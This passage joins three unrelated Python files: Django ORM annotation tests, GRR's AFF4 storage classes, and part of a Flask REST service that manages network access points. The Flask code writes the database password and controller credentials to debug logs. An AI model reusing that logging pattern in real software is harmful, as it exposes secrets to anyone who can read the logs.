Chun', age=25) cls.a8 = Author.objects.create(name='Peter Norvig', age=57) cls.a9 = Author.objects.create(name='Stuart Russell', age=46) cls.a1.friends.add(cls.a2, cls.a4) cls.a2.friends.add(cls.a1, cls.a7) cls.a4.friends.add(cls.a1) cls.a5.friends.add(cls.a6, cls.a7) cls.a6.friends.add(cls.a5, cls.a7) cls.a7.friends.add(cls.a2, cls.a5, cls.a6) cls.a8.friends.add(cls.a9) cls.a9.friends.add(cls.a8) cls.p1 = Publisher.objects.create(name='Apress', num_awards=3) cls.p2 = Publisher.objects.create(name='Sams', num_awards=1) cls.p3 = Publisher.objects.create(name='Prentice Hall', num_awards=7) cls.p4 = Publisher.objects.create(name='Morgan Kaufmann', num_awards=9) cls.p5 = Publisher.objects.create(name="Jonno's House of Books", num_awards=0) cls.b1 = Book.objects.create( isbn='159059725', name='The Definitive Guide to Django: Web Development Done Right', pages=447, rating=4.5, price=Decimal('30.00'), contact=cls.a1, publisher=cls.p1, pubdate=datetime.date(2007, 12, 6) ) cls.b2 = Book.objects.create( isbn='067232959', name='Sams Teach Yourself Django in 24 Hours', pages=528, rating=3.0, price=Decimal('23.09'), contact=cls.a3, publisher=cls.p2, pubdate=datetime.date(2008, 3, 3) ) cls.b3 = Book.objects.create( isbn='159059996', name='Practical Django Projects', pages=300, rating=4.0, price=Decimal('29.69'), contact=cls.a4, publisher=cls.p1, pubdate=datetime.date(2008, 6, 23) ) cls.b4 = Book.objects.create( isbn='013235613', name='Python Web Development with Django', pages=350, rating=4.0, price=Decimal('29.69'), contact=cls.a5, publisher=cls.p3, pubdate=datetime.date(2008, 11, 3) ) cls.b5 = Book.objects.create( isbn='013790395', name='Artificial Intelligence: A Modern Approach', pages=1132, rating=4.0, price=Decimal('82.80'), contact=cls.a8, publisher=cls.p3, pubdate=datetime.date(1995, 1, 15) ) cls.b6 = Book.objects.create( isbn='155860191', name='Paradigms of Artificial Intelligence Programming: Case Studies in Common Lisp', pages=946, rating=5.0, price=Decimal('75.00'), 
contact=cls.a8, publisher=cls.p4, pubdate=datetime.date(1991, 10, 15) ) cls.b1.authors.add(cls.a1, cls.a2) cls.b2.authors.add(cls.a3) cls.b3.authors.add(cls.a4) cls.b4.authors.add(cls.a5, cls.a6, cls.a7) cls.b5.authors.add(cls.a8, cls.a9) cls.b6.authors.add(cls.a8) s1 = Store.objects.create( name='Amazon.com', original_opening=datetime.datetime(1994, 4, 23, 9, 17, 42), friday_night_closing=datetime.time(23, 59, 59) ) s2 = Store.objects.create( name='Books.com', original_opening=datetime.datetime(2001, 3, 15, 11, 23, 37), friday_night_closing=datetime.time(23, 59, 59) ) s3 = Store.objects.create( name="Mamma and Pappa's Books", original_opening=datetime.datetime(1945, 4, 25, 16, 24, 14), friday_night_closing=datetime.time(21, 30) ) s1.books.add(cls.b1, cls.b2, cls.b3, cls.b4, cls.b5, cls.b6) s2.books.add(cls.b1, cls.b3, cls.b5, cls.b6) s3.books.add(cls.b3, cls.b4, cls.b6) def test_basic_annotation(self): books = Book.objects.annotate( is_book=Value(1, output_field=IntegerField())) for book in books: self.assertEqual(book.is_book, 1) def test_basic_f_annotation(self): books = Book.objects.annotate(another_rating=F('rating')) for book in books: self.assertEqual(book.another_rating, book.rating) def test_joined_annotation(self): books = Book.objects.select_related('publisher').annotate( num_awards=F('publisher__num_awards')) for book in books: self.assertEqual(book.num_awards, book.publisher.num_awards) def test_mixed_type_annotation_date_interval(self): active = datetime.datetime(2015, 3, 20, 14, 0, 0) duration = datetime.timedelta(hours=1) expires = datetime.datetime(2015, 3, 20, 14, 0, 0) + duration Ticket.objects.create(active_at=active, duration=duration) t = Ticket.objects.annotate( expires=ExpressionWrapper(F('active_at') + F('duration'), output_field=DateTimeField()) ).first() self.assertEqual(t.expires, expires) def test_mixed_type_annotation_numbers(self): test = self.b1 b = Book.objects.annotate( combined=ExpressionWrapper(F('pages') + F('rating'), 
output_field=IntegerField()) ).get(isbn=test.isbn) combined = int(test.pages + test.rating) self.assertEqual(b.combined, combined) def test_annotate_with_aggregation(self): books = Book.objects.annotate( is_book=Value(1, output_field=IntegerField()), rating_count=Count('rating')) for book in books: self.assertEqual(book.is_book, 1) self.assertEqual(book.rating_count, 1) def test_aggregate_over_annotation(self): agg = Author.objects.annotate(other_age=F('age')).aggregate(otherage_sum=Sum('other_age')) other_agg = Author.objects.aggregate(age_sum=Sum('age')) self.assertEqual(agg['otherage_sum'], other_agg['age_sum']) def test_filter_annotation(self): books = Book.objects.annotate( is_book=Value(1, output_field=IntegerField()) ).filter(is_book=1) for book in books: self.assertEqual(book.is_book, 1) def test_filter_annotation_with_f(self): books = Book.objects.annotate( other_rating=F('rating') ).filter(other_rating=3.5) for book in books: self.assertEqual(book.other_rating, 3.5) def test_filter_annotation_with_double_f(self): books = Book.objects.annotate( other_rating=F('rating') ).filter(other_rating=F('rating')) for book in books: self.assertEqual(book.other_rating, book.rating) def test_filter_agg_with_double_f(self): books = Book.objects.annotate( sum_rating=Sum('rating') ).filter(sum_rating=F('sum_rating')) for book in books: self.assertEqual(book.sum_rating, book.rating) def test_filter_wrong_annotation(self): with six.assertRaisesRegex(self, FieldError, "Cannot resolve keyword .*"): list(Book.objects.annotate( sum_rating=Sum('rating') ).filter(sum_rating=F('nope'))) def test_combined_annotation_commutative(self): book1 = Book.objects.annotate(adjusted_rating=F('rating') + 2).get(pk=self.b1.pk) book2 = Book.objects.annotate(adjusted_rating=2 + F('rating')).get(pk=self.b1.pk) self.assertEqual(book1.adjusted_rating, book2.adjusted_rating) book1 = Book.objects.annotate(adjusted_rating=F('rating') + None).get(pk=self.b1.pk) book2 = 
Book.objects.annotate(adjusted_rating=None + F('rating')).get(pk=self.b1.pk) self.assertEqual(book1.adjusted_rating, book2.adjusted_rating) def test_update_with_annotation(self): book_preupdate = Book.objects.get(pk=self.b2.pk) Book.objects.annotate(other_rating=F('rating') - 1).update(rating=F('other_rating')) book_postupdate = Book.objects.get(pk=self.b2.pk) self.assertEqual(book_preupdate.rating - 1, book_postupdate.rating) def test_annotation_with_m2m(self): books = Book.objects.annotate(author_age=F('authors__age')).filter(pk=self.b1.pk).order_by('author_age') self.assertEqual(books[0].author_age, 34) self.assertEqual(books[1].author_age, 35) def test_annotation_reverse_m2m(self): books = Book.objects.annotate( store_name=F('store__name')).filter( name='Practical Django Projects').order_by( 'store_name') self.assertQuerysetEqual( books, [ 'Amazon.com', 'Books.com', 'Mamma and Pappa\'s Books' ], lambda b: b.store_name ) def test_values_annotation(self): """ Annotations can reference fields in a values clause, and contribute to an existing values clause. """ # annotate references a field in values() qs = Book.objects.values('rating').annotate(other_rating=F('rating') - 1) book = qs.get(pk=self.b1.pk) self.assertEqual(book['rating'] - 1, book['other_rating']) # filter refs the annotated value book = qs.get(other_rating=4) self.assertEqual(book['other_rating'], 4) # can annotate an existing values with a new field book = qs.annotate(other_isbn=F('isbn')).get(other_rating=4) self.assertEqual(book['other_rating'], 4) self.assertEqual(book['other_isbn'], '155860191') def test_defer_annotation(self): """ Deferred attributes can be referenced by an annotation, but they are not themselves deferred, and cannot be deferred. 
""" qs = Book.objects.defer('rating').annotate(other_rating=F('rating') - 1) with self.assertNumQueries(2): book = qs.get(other_rating=4) self.assertEqual(book.rating, 5) self.assertEqual(book.other_rating, 4) with six.assertRaisesRegex(self, FieldDoesNotExist, "\w has no field named u?'other_rating'"): book = qs.defer('other_rating').get(other_rating=4) def test_mti_annotations(self): """ Fields on an inherited model can be referenced by an annotated field. """ d = DepartmentStore.objects.create( name='Angus & Robinson', original_opening=datetime.date(2014, 3, 8), friday_night_closing=datetime.time(21, 00, 00), chain='Westfield' ) books = Book.objects.filter(rating__gt=4) for b in books: d.books.add(b) qs = DepartmentStore.objects.annotate( other_name=F('name'), other_chain=F('chain'), is_open=Value(True, BooleanField()), book_isbn=F('books__isbn') ).order_by('book_isbn').filter(chain='Westfield') self.assertQuerysetEqual( qs, [ ('Angus & Robinson', 'Westfield', True, '155860191'), ('Angus & Robinson', 'Westfield', True, '159059725') ], lambda d: (d.other_name, d.other_chain, d.is_open, d.book_isbn) ) def test_null_annotation(self): """ Test that annotating None onto a model round-trips """ book = Book.objects.annotate(no_value=Value(None, output_field=IntegerField())).first() self.assertIsNone(book.no_value) def test_order_by_annotation(self): authors = Author.objects.annotate(other_age=F('age')).order_by('other_age') self.assertQuerysetEqual( authors, [ 25, 29, 29, 34, 35, 37, 45, 46, 57, ], lambda a: a.other_age ) def test_order_by_aggregate(self): authors = Author.objects.values('age').annotate(age_count=Count('age')).order_by('age_count', 'age') self.assertQuerysetEqual( authors, [ (25, 1), (34, 1), (35, 1), (37, 1), (45, 1), (46, 1), (57, 1), (29, 2), ], lambda a: (a['age'], a['age_count']) ) def test_annotate_exists(self): authors = Author.objects.annotate(c=Count('id')).filter(c__gt=1) self.assertFalse(authors.exists()) def 
test_column_field_ordering(self): """ Test that columns are aligned in the correct order for resolve_columns. This test will fail on mysql if column ordering is out. Column fields should be aligned as: 1. extra_select 2. model_fields 3. annotation_fields 4. model_related_fields """ store = Store.objects.first() Employee.objects.create(id=1, first_name='Max', manager=True, last_name='Paine', store=store, age=23, salary=Decimal(50000.00)) Employee.objects.create(id=2, first_name='Buffy', manager=False, last_name='Summers', store=store, age=18, salary=Decimal(40000.00)) qs = Employee.objects.extra( select={'random_value': '42'} ).select_related('store').annotate( annotated_value=Value(17, output_field=IntegerField()) ) rows = [ (1, 'Max', True, 42, 'Paine', 23, Decimal(50000.00), store.name, 17), (2, 'Buffy', False, 42, 'Summers', 18, Decimal(40000.00), store.name, 17) ] self.assertQuerysetEqual( qs.order_by('id'), rows, lambda e: ( e.id, e.first_name, e.manager, e.random_value, e.last_name, e.age, e.salary, e.store.name, e.annotated_value)) def test_column_field_ordering_with_deferred(self): store = Store.objects.first() Employee.objects.create(id=1, first_name='Max', manager=True, last_name='Paine', store=store, age=23, salary=Decimal(50000.00)) Employee.objects.create(id=2, first_name='Buffy', manager=False, last_name='Summers', store=store, age=18, salary=Decimal(40000.00)) qs = Employee.objects.extra( select={'random_value': '42'} ).select_related('store').annotate( annotated_value=Value(17, output_field=IntegerField()) ) rows = [ (1, 'Max', True, 42, 'Paine', 23, Decimal(50000.00), store.name, 17), (2, 'Buffy', False, 42, 'Summers', 18, Decimal(40000.00), store.name, 17) ] # and we respect deferred columns! 
self.assertQuerysetEqual( qs.defer('age').order_by('id'), rows, lambda e: ( e.id, e.first_name, e.manager, e.random_value, e.last_name, e.age, e.salary, e.store.name, e.annotated_value)) @cxOracle_py3_bug def test_custom_functions(self): Company(name='Apple', motto=None, ticker_name='APPL', description='Beautiful Devices').save() Company(name='Django Software Foundation', motto=None, ticker_name=None, description=None).save() Company(name='Google', motto='Do No Evil', ticker_name='GOOG', description='Internet Company').save() Company(name='Yahoo', motto=None, ticker_name=None, description='Internet Company').save() qs = Company.objects.annotate( tagline=Func( F('motto'), F('ticker_name'), F('description'), Value('No Tag'), function='COALESCE') ).order_by('name') self.assertQuerysetEqual( qs, [ ('Apple', 'APPL'), ('Django Software Foundation', 'No Tag'), ('Google', 'Do No Evil'), ('Yahoo', 'Internet Company') ], lambda c: (c.name, c.tagline) ) @cxOracle_py3_bug def test_custom_functions_can_ref_other_functions(self): Company(name='Apple', motto=None, ticker_name='APPL', description='Beautiful Devices').save() Company(name='Django Software Foundation', motto=None, ticker_name=None, description=None).save() Company(name='Google', motto='Do No Evil', ticker_name='GOOG', description='Internet Company').save() Company(name='Yahoo', motto=None, ticker_name=None, description='Internet Company').save() class Lower(Func): function = 'LOWER' qs = Company.objects.annotate( tagline=Func( F('motto'), F('ticker_name'), F('description'), Value('No Tag'), function='COALESCE') ).annotate( tagline_lower=Lower(F('tagline'), output_field=CharField()) ).order_by('name') # LOWER function supported by: # oracle, postgres, mysql, sqlite, sqlserver self.assertQuerysetEqual( qs, [ ('Apple', 'APPL'.lower()), ('Django Software Foundation', 'No Tag'.lower()), ('Google', 'Do No Evil'.lower()), ('Yahoo', 'Internet Company'.lower()) ], lambda c: (c.name, c.tagline_lower) )
#!/usr/bin/env python
"""These are standard aff4 objects."""


import hashlib
import StringIO

from grr.lib import aff4
from grr.lib import data_store
from grr.lib import flow
from grr.lib import rdfvalue
from grr.lib import utils


class VFSDirectory(aff4.AFF4Volume):
  """This represents a directory from the client."""
  default_container = "VFSDirectory"

  # We contain other objects within the tree.
  _behaviours = frozenset(["Container"])

  def Update(self, attribute=None, priority=None):
    """Refresh an old attribute.

    Note that refreshing the attribute is asynchronous. It does not change
    anything about the current object - you need to reopen the same URN some
    time later to get fresh data.

    Attributes:
       CONTAINS - Refresh the content of the directory listing.

    Args:
       attribute: An attribute object as listed above.
       priority: Priority to set for updating flow, None for default.

    Returns:
       The Flow ID that is pending

    Raises:
       IOError: If there has been an error starting the flow.
    """
    # client id is the first path element
    client_id = self.urn.Split()[0]

    if attribute == self.Schema.CONTAINS:
      # Get the pathspec for this object
      pathspec = self.Get(self.Schema.PATHSPEC)

      stripped_components = []
      parent = self

      while not pathspec and len(parent.urn.Split()) > 1:
        # We try to recurse up the tree to get a real pathspec.
        # These directories are created automatically without pathspecs when a
        # deep directory is listed without listing the parents.
        # Note /fs/os or /fs/tsk won't be updateable so we will raise IOError
        # if we try.
        stripped_components.append(parent.urn.Basename())
        pathspec = parent.Get(parent.Schema.PATHSPEC)
        parent = aff4.FACTORY.Open(parent.urn.Dirname(), token=self.token)

      if pathspec:
        if stripped_components:
          # We stripped pieces of the URL, time to add them back at the deepest
          # nested path.
          new_path = utils.JoinPath(pathspec.last.path,
                                    *stripped_components[:-1])
          pathspec.last.path = new_path

        flow_id = flow.GRRFlow.StartFlow(client_id=client_id,
                                         flow_name="ListDirectory",
                                         pathspec=pathspec,
                                         priority=priority,
                                         notify_to_user=False,
                                         token=self.token)
      else:
        raise IOError("Item has no pathspec.")

    return flow_id

  class SchemaCls(aff4.AFF4Volume.SchemaCls):
    """Attributes specific to VFSDirectory."""
    STAT = aff4.Attribute("aff4:stat", rdfvalue.StatEntry,
                          "A StatResponse protobuf describing this file.",
                          "stat")

    PATHSPEC = aff4.Attribute(
        "aff4:pathspec", rdfvalue.PathSpec,
        "The pathspec used to retrieve this object from the client.",
        "pathspec")


class HashList(rdfvalue.RDFBytes):
  """A list of hashes."""

  # Byte width of one stored digest (sha256).
  HASH_SIZE = 32

  def __len__(self):
    return len(self._value) / self.HASH_SIZE

  def __iter__(self):
    for i in range(len(self)):
      yield self[i]

  def __getitem__(self, idx):
    return rdfvalue.HashDigest(
        self._value[idx * self.HASH_SIZE: (idx + 1) * self.HASH_SIZE])


class BlobImage(aff4.AFF4Image):
  """An AFF4 stream which stores chunks by hashes.

  The hash stream is kept within an AFF4 Attribute, instead of another stream
  making it more efficient for smaller files.
  """
  # Size of a sha256 hash
  _HASH_SIZE = 32

  # How many chunks we read ahead
  _READAHEAD = 5

  def Initialize(self):
    super(BlobImage, self).Initialize()
    self.content_dirty = False
    if self.mode == "w":
      self.index = StringIO.StringIO("")
      self.finalized = False
    else:
      self.index = StringIO.StringIO(self.Get(self.Schema.HASHES, ""))
      self.finalized = self.Get(self.Schema.FINALIZED, False)

  def Truncate(self, offset=0):
    if offset != 0:
      raise IOError("Non-zero truncation not supported for BlobImage")
    super(BlobImage, self).Truncate(0)
    self.index = StringIO.StringIO("")
    self.finalized = False

  def _GetChunkForWriting(self, chunk):
    """Chunks must be added using the AddBlob() method."""
    raise NotImplementedError("Direct writing of HashImage not allowed.")

  def _GetChunkForReading(self, chunk):
    """Retrieve the relevant blob from the AFF4 data store or cache."""
    result = None
    offset = chunk * self._HASH_SIZE
    self.index.seek(offset)

    chunk_name = self.index.read(self._HASH_SIZE)
    try:
      result = self.chunk_cache.Get(chunk_name)
    except KeyError:
      # Read ahead a few chunks.
      self.index.seek(offset)
      readahead = {}

      for _ in range(self._READAHEAD):
        name = self.index.read(self._HASH_SIZE)
        if name and name not in self.chunk_cache:
          urn = aff4.ROOT_URN.Add("blobs").Add(name.encode("hex"))
          readahead[urn] = name

      fds = aff4.FACTORY.MultiOpen(readahead, mode="r", token=self.token)
      for fd in fds:
        name = readahead[fd.urn]

        # Remember the right fd
        if name == chunk_name:
          result = fd

        # Put back into the cache
        self.chunk_cache.Put(readahead[fd.urn], fd)

    return result

  def FromBlobImage(self, fd):
    """Copy this file cheaply from another BlobImage."""
    self.content_dirty = True
    self.SetChunksize(fd.chunksize)
    self.index = StringIO.StringIO(fd.index.getvalue())
    self.size = fd.size

  def Flush(self, sync=True):
    if self.content_dirty:
      self.Set(self.Schema.SIZE(self.size))
      self.Set(self.Schema.HASHES(self.index.getvalue()))
      self.Set(self.Schema.FINALIZED(self.finalized))
    super(BlobImage, self).Flush(sync)

  def AppendContent(self, src_fd):
    """Create new blob hashes and append to BlobImage.

    We don't support writing at arbitrary file offsets, but this method provides
    a convenient way to add blobs for a new file, or append content to an
    existing one.

    Args:
      src_fd: source file handle open for read
    Raises:
      IOError: if blob has already been finalized.
    """
    while 1:
      blob = src_fd.read(self.chunksize)
      if not blob:
        break
      blob_hash = hashlib.sha256(blob).digest()
      blob_urn = rdfvalue.RDFURN("aff4:/blobs").Add(blob_hash.encode("hex"))

      try:
        fd = aff4.FACTORY.Open(blob_urn, "AFF4MemoryStream", mode="r",
                               token=self.token)
      except IOError:
        fd = aff4.FACTORY.Create(blob_urn, "AFF4MemoryStream", mode="w",
                                 token=self.token)
        fd.Write(blob)
        fd.Close(sync=True)

      self.AddBlob(blob_hash, len(blob))

    self.Flush()

  def AddBlob(self, blob_hash, length):
    """Add another blob to this image using its hash.

    Once a blob is added that is smaller than the chunksize we finalize the
    file, since handling adding more blobs makes the code much more complex.

    Args:
      blob_hash: sha256 binary digest
      length: int length of blob

    Raises:
      IOError: if blob has been finalized.
    """
    if self.finalized and length > 0:
      raise IOError("Can't add blobs to finalized BlobImage")

    self.content_dirty = True
    self.index.seek(0, 2)
    self.index.write(blob_hash)
    self.size += length

    if length < self.chunksize:
      self.finalized = True

  class SchemaCls(aff4.AFF4Image.SchemaCls):
    """The schema for Blob Images."""
    STAT = aff4.AFF4Object.VFSDirectory.SchemaCls.STAT

    HASHES = aff4.Attribute("aff4:hashes", rdfvalue.HashList,
                            "List of hashes of each chunk in this file.")

    FINGERPRINT = aff4.Attribute("aff4:fingerprint",
                                 rdfvalue.FingerprintResponse,
                                 "Protodict containing arrays of hashes.")

    FINALIZED = aff4.Attribute("aff4:finalized",
                               rdfvalue.RDFBool,
                               "Once a blobimage is finalized, further writes"
                               " will raise exceptions.")


class HashImage(aff4.AFF4Image):
  """An AFF4 Image which refers to chunks by their hash.

  This object stores a large image in chunks. Each chunk is stored using its
  hash in the AFF4 data store. We have an index with a series of hashes stored
  back to back. When we need to read a chunk, we seek the index for the hash,
  and then open the data blob indexed by this hash. Chunks are cached as per
  the AFF4Image implementation.

  Assumptions:
    Hashes do not collide.
    All data blobs have the same size (the chunk size), except possibly the
    last one in the file.
  """

  # Size of a sha256 hash
  _HASH_SIZE = 32

  # How many chunks we read ahead
  _READAHEAD = 5
  _data_dirty = False

  def Initialize(self):
    super(HashImage, self).Initialize()
    self.index = None

  def _OpenIndex(self):
    if self.index is None:
      index_urn = self.urn.Add("index")
      self.index = aff4.FACTORY.Create(index_urn, "AFF4Image",
                                       mode=self.mode, token=self.token)

  def _GetChunkForWriting(self, chunk):
    """Chunks must be added using the AddBlob() method."""
    raise NotImplementedError("Direct writing of HashImage not allowed.")

  def _GetChunkForReading(self, chunk):
    """Retrieve the relevant blob from the AFF4 data store or cache."""
    result = None
    self._OpenIndex()
    self.index.Seek(chunk * self._HASH_SIZE)

    chunk_name = self.index.Read(self._HASH_SIZE)
    try:
      result = self.chunk_cache.Get(chunk_name)
    except KeyError:
      # Read ahead a few chunks.
      self.index.Seek(-self._HASH_SIZE, whence=1)
      readahead = {}

      for _ in range(self._READAHEAD):
        name = self.index.Read(self._HASH_SIZE)
        if name and name not in self.chunk_cache:
          urn = aff4.ROOT_URN.Add("blobs").Add(name.encode("hex"))
          readahead[urn] = name

      fds = aff4.FACTORY.MultiOpen(readahead, mode="r", token=self.token)
      for fd in fds:
        name = readahead[fd.urn]

        # Remember the right fd
        if name == chunk_name:
          result = fd

        # Put back into the cache
        self.chunk_cache.Put(readahead[fd.urn], fd)

    return result

  def Close(self, sync=True):
    if self._data_dirty:
      self.Set(self.Schema.SIZE(self.size))
    if self.index:
      self.index.Close(sync)
    super(HashImage, self).Close(sync)

  def AddBlob(self, blob_hash, length):
    """Add another blob to this image using its hash."""
    self._OpenIndex()
    self._data_dirty = True
    self.index.Seek(0, 2)
    self.index.Write(blob_hash)
    self.size += length

  class SchemaCls(aff4.AFF4Image.SchemaCls):
    """The schema for AFF4 files in the GRR VFS."""
    STAT = aff4.AFF4Object.VFSDirectory.SchemaCls.STAT
    CONTENT_LOCK = aff4.Attribute(
        "aff4:content_lock", rdfvalue.RDFURN,
        "This lock contains a URN pointing to the flow that is currently "
        "updating this object.")
    FINGERPRINT = aff4.Attribute("aff4:fingerprint",
                                 rdfvalue.FingerprintResponse,
                                 "Protodict containing arrays of hashes.")


class AFF4Index(aff4.AFF4Object):
  """An aff4 object which manages access to an index.

  This object has no actual attributes, it simply manages the index.
  """

  # Value to put in the cell for index hits.
  PLACEHOLDER_VALUE = "X"

  def __init__(self, urn, **kwargs):
    # Never read anything directly from the table by forcing an empty clone.
    kwargs["clone"] = {}
    super(AFF4Index, self).__init__(urn, **kwargs)

    # We collect index data here until we flush.
    self.to_set = set()
    self.to_delete = set()

  def Flush(self, sync=False):
    """Flush the data to the index."""
    super(AFF4Index, self).Flush(sync=sync)

    # Remove entries from deletion set that are going to be added anyway.
    self.to_delete = self.to_delete.difference(self.to_set)

    # Convert sets into dicts that MultiSet handles.
    to_delete = dict(zip(self.to_delete,
                         self.PLACEHOLDER_VALUE * len(self.to_delete)))
    to_set = dict(zip(self.to_set,
                      self.PLACEHOLDER_VALUE * len(self.to_set)))

    data_store.DB.MultiSet(self.urn, to_set, to_delete=to_delete,
                           token=self.token, replace=True, sync=sync)
    self.to_set = set()
    self.to_delete = set()

  def Close(self, sync=False):
    self.Flush(sync=sync)
    super(AFF4Index, self).Close(sync=sync)

  def Add(self, urn, attribute, value):
    """Add the attribute of an AFF4 object to the index.

    Args:
      urn: The URN of the AFF4 object this attribute belongs to.
      attribute: The attribute to add to the index.
      value: The value of the attribute to index.

    Raises:
      RuntimeError: If a bad URN is passed in.
    """
    if not isinstance(urn, rdfvalue.RDFURN):
      raise RuntimeError("Bad urn parameter for index addition.")
    column_name = "index:%s:%s:%s" % (
        attribute.predicate, value.lower(), urn)
    self.to_set.add(column_name)

  def Query(self, attributes, regex, limit=100):
    """Query the index for the attribute.

    Args:
      attributes: A list of attributes to query for.
      regex: The regex to search this attribute.
      limit: A (start, length) tuple of integers representing subjects to
          return. Useful for paging. If its a single integer we take
          it as the length limit (start=0).

    Returns:
      A list of RDFURNs which match the index search.
    """
    # Make the regular expressions.
    regexes = ["index:%s:%s:.*" % (a.predicate, regex.lower())
               for a in attributes]
    start = 0
    try:
      start, length = limit
    except TypeError:
      length = limit

    # Get all the hits
    index_hits = set()
    for col, _, _ in data_store.DB.ResolveRegex(
        self.urn, regexes, token=self.token,
        timestamp=data_store.DB.ALL_TIMESTAMPS):
      # Extract URN from the column_name.
      index_hits.add(rdfvalue.RDFURN(col.rsplit("aff4:/", 1)[1]))

    hits = []
    for i, hit in enumerate(index_hits):
      if i < start:
        continue
      hits.append(hit)

      if i >= start + length - 1:
        break

    return hits

  def _QueryRaw(self, regex):
    return set([(x, y) for (y, x, _) in data_store.DB.ResolveRegex(
        self.urn, regex, token=self.token,
        timestamp=data_store.DB.ALL_TIMESTAMPS)])

  def DeleteAttributeIndexesForURN(self, attribute, value, urn):
    """Remove all entries for a given attribute referring to a specific urn."""
    if not isinstance(urn, rdfvalue.RDFURN):
      raise RuntimeError("Bad urn parameter for index deletion.")
    column_name = "index:%s:%s:%s" % (
        attribute.predicate, value.lower(), urn)
    self.to_delete.add(column_name)


class TempFile(aff4.AFF4MemoryStream):
  """A temporary file (with a random URN) to store an RDFValue."""

  def __init__(self, urn, **kwargs):
    if urn is None:
      urn = rdfvalue.RDFURN("aff4:/tmp").Add("%X" % utils.PRNG.GetULong())

    super(TempFile, self).__init__(urn, **kwargs)
''' Copyright 2014-2016 PTIN Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ''' import logging import configparser from flask import Flask, request, jsonify from vtn import VtnWrapper from database.database import db import database.nap as nap import database.nfvi as nfvi import database.service as service from sqlalchemy.exc import IntegrityError logger = logging.getLogger() logging.basicConfig(level=logging.DEBUG, format=('%(asctime)s - ' '%(levelname)s - %(message)s')) config = configparser.ConfigParser() config.read('./wicm.ini') if not config.getboolean('default', 'verbose'): logger.setLevel(logging.INFO) logger.info('Starting..') mysql_connect = 'mysql+mysqlconnector://{}:{}@{}:{}/{}'.format( config.get('database', 'username'), config.get('database', 'password'), config.get('database', 'host'), config.getint('database', 'port'), config.get('database', 'name') ) logger.debug('Database connection string: {}'.format(mysql_connect)) logger.debug('OpenDaylight connection {}:{}@{}:{}'.format( config.get('opendaylight', 'host'), config.getint('opendaylight', 'port'), config.get('opendaylight', 'username'), config.get('opendaylight', 'password') )) vtn = VtnWrapper( config.get('opendaylight', 'host'), config.get('opendaylight', 'port'), config.get('opendaylight', 'username'), config.get('opendaylight', 'password') ) app = Flask(__name__) app.config['SQLALCHEMY_DATABASE_URI'] = mysql_connect app.config['SQLALCHEMY_POOL_RECYCLE'] = 299 # compatibility with MariaDB db.init_app(app) @app.route('/nap', 
# ---------------------------------------------------------------------------
# WICM REST API route handlers (Flask).
# NOTE(review): the first line below is the tail of an
# @app.route('/nap', ...) decorator whose opening lies before this chunk;
# it is kept verbatim.
# ---------------------------------------------------------------------------
           methods=['POST', 'GET', 'DELETE'], strict_slashes=False)
@app.route('/nap/<string:mkt_id>', methods=['GET', 'DELETE'],
           strict_slashes=False)
def nap_request(mkt_id=None):
    """Create (POST), delete (DELETE) or fetch (GET) NAP records.

    DELETE/GET use the optional ``mkt_id`` URL segment; when it is absent
    they operate on all NAPs.
    """
    if request.method == 'POST':
        # NOTE(review): this rebinds the view function's own name to the
        # request payload; kept as-is (local rebinding only).
        nap_request = request.json
        logger.info('Request to create NAP: {}'.format(nap_request))
        client_mkt_id = nap_request['nap']['client_mkt_id']
        mkt_id = nap_request['nap']['mkt_id']
        # Customer-edge / provider-edge endpoints as (switch, port, vlan_id).
        ce = (nap_request['nap']['switch'],
              nap_request['nap']['ce_port'],
              nap_request['nap']['ce_transport']['vlan_id'])
        pe = (nap_request['nap']['switch'],
              nap_request['nap']['pe_port'],
              nap_request['nap']['pe_transport']['vlan_id'])
        # Persist first, then mirror the NAP to the VTN coordinator.
        # NOTE(review): if vtn.nap_create raises, the DB insert has already
        # happened — confirm whether that is intentional.
        result = jsonify({'inserted': nap.put(client_mkt_id, mkt_id,
                                              ce, pe)}), 201
        vtn.nap_create(client_mkt_id, mkt_id, ce, pe)
    elif request.method == 'DELETE':
        logger.info('Request to delete NAP: {}'.format(
            'id -> {}'.format(mkt_id) if mkt_id else 'All NAPs'))
        # Fetch before deleting so the VTN side can be cleaned up too.
        nap_info = nap.get(mkt_id)
        result = nap.delete(mkt_id)
        # NOTE(review): only the first fetched NAP is removed from the VTN
        # even when mkt_id is None (delete-all) — confirm intended.
        vtn.nap_delete(nap_info[0]['client_mkt_id'], nap_info[0]['mkt_id'])
        result = jsonify({'deleted': result}), 200
    else:
        # GET: one NAP by id, or all of them.
        logger.info('Request to get NAP: {}'.format(
            'id -> {}'.format(mkt_id) if mkt_id else 'All NAPs'))
        result = jsonify({'naps': nap.get(mkt_id)}), 200
    return result


@app.route('/nfvi', methods=['POST', 'GET', 'DELETE'], strict_slashes=False)
@app.route('/nfvi/<string:mkt_id>', methods=['GET', 'DELETE'],
           strict_slashes=False)
def nfvi_request(mkt_id=None):
    """Create (POST), delete (DELETE) or fetch (GET) NFVI-PoP records."""
    if request.method == 'POST':
        nfvi_request = request.json
        logger.info('Request to create NFVI-POP: {}'.format(nfvi_request))
        mkt_id = nfvi_request['nfvi']['mkt_id']
        # NFVI attachment as a (switch, port) pair.
        port = (nfvi_request['nfvi']['switch'], nfvi_request['nfvi']['port'])
        result = jsonify({'inserted': nfvi.put(mkt_id, port)}), 201
    elif request.method == 'DELETE':
        # TODO: Delete bridge @ ODL!
        logger.info('Request to delete NFVI-POP: {}'.format(
            'id -> {}'.format(mkt_id) if mkt_id else 'All NFVI-PoPs'))
        result = jsonify({'deleted': nfvi.delete(mkt_id)}), 200
    else:
        logger.info('Request to get NFVI-POP: {}'.format(
            'id -> {}'.format(mkt_id) if mkt_id else 'All NFVI-PoPs'))
        result = jsonify({'nfvis': nfvi.get(mkt_id)}), 200
    return result


@app.route('/vnf-connectivity', methods=['POST'], strict_slashes=False)
def service_request_post():
    """Allocate VLANs for a new VNF-connectivity service.

    Returns 201 with the allocation on success; 400 for malformed/duplicate
    requests, 500 when the VLAN pool is exhausted.
    """
    try:
        service_request = request.json
        logger.info('Request to create service: {}'.format(service_request))
        ns_instance_id = service_request['service']['ns_instance_id']
        client_mkt_id = service_request['service']['client_mkt_id']
        nap_id = service_request['service']['nap_mkt_id']
        ce_pe_nfvi_ids = service_request['service']['ce_pe']
